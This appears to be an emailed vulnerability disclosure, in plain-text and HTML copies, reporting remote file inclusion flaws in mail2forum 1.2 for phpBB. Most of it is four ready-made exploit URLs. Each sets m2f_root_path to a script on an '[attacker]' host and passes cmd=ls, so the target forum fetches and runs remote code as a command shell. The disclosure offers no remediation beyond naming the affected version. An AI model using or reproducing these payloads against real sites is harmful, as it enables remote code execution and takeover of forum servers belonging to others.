------=_Part_28928_1151264.1153174544672 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities Discovered By OLiBekaS Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : mail for phpbb (bulletin board/forum software) version : latest version [ 1.2 ] URL : http://www.www.mail2forum.com Exploit : http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls ------=_Part_28928_1151264.1153174544672 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline
mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities
 
Discovered By OLiBekaS
 

Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com

Exploit     : 

http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls

------=_Part_28928_1151264.1153174544672--